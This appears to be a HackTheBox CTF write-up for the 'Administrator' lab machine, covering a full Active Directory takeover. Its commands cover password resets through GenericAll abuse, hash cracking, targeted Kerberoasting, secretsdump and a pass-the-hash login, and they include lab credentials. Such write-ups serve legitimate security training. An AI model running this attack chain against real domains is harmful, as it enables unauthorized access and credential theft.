Post

HackTheBox Administrator Writeup

Posted
By x3ric
3 min read

Explore the fundamentals of cybersecurity in the University Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.11.42 administrator.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.42"
domain="administrator.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV administrator.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

Nmap scan report for administrator.htb (10.10.11.42)
Host is up (0.056s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-18 18:45:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time: 
|   date: 2024-11-18T18:45:39
|_  start_date: N/A

BloodHound Enumeration

Run BloodHound to collect Active Directory data:

1

bloodhound-python -c All -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42
  • After ingestion (see this tutorial), we find that Olivia has GenericAll permission over Michael.

Changing Passwords with BloodyAD

Change Michael’s Password

1

bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "olivia" -p "ichliebedich" set password "michael" "Password@123"

Change Benjamin’s Password

1

bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "michael" -p "Password@123" set password "benjamin" "Password@123"

Accessing FTP

Login to FTP using Benjamin’s credentials:

1

ftp 10.10.11.42
  • Username: benjamin
  • Password: Password@123

Download the backup file:

1
2

ls
get Backup.psafe3

Cracking the Password Safe File

Crack the password safe file:

1

hashcat -m 5200 -a 0 Backup.psafe3 /usr/share/dict/rockyou.txt
  • Cracked Password: tekieromucho

Install a Password Safe reader (e.g., PasswordSafe) to open Backup.psafe3 using the cracked password.

Extracted credentials:

  • alexander: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
  • emily: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
  • emma: WwANQWnmJnGV07WQN8bMS7FMAbjNur

Accessing the Machine via Evil-WinRM

Login as Emily:

1

evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Retrieve the user flag:

1

cat \users\emily\Desktop\user.txt

Kerberoasting Attack

Attempt Kerberoasting:

1

targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Encountered error:

1

[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Fix the clock skew:

1
2

serverskew=$(ntpdate -q administrator.htb | awk '{print $6}' | head -n 1 | tr -d '+,' | cut -d '.' -f 1)
faketime "$(date -d "+$serverskew seconds" +"%Y-%m-%d %H:%M:%S")" targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Save the hash to hash.txt.

Crack the hash:

1

hashcat hash.txt /usr/share/dict/rockyou.txt
  • Cracked Password: limpbizkit

Dumping Secrets with SecretsDump

Dump secrets using Ethan’s credentials:

1

secretsdump.py 'administrator.htb/ethan:limpbizkit'@'administrator.htb'

Gaining Administrator Access

Login as Administrator using the dumped NTLM hash:

1

evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'

Retrieve the root flag:

1

type \users\administrator\desktop\root.txt
machine
htb cft writeup windows
This post is licensed under CC BY 4.0 by the author.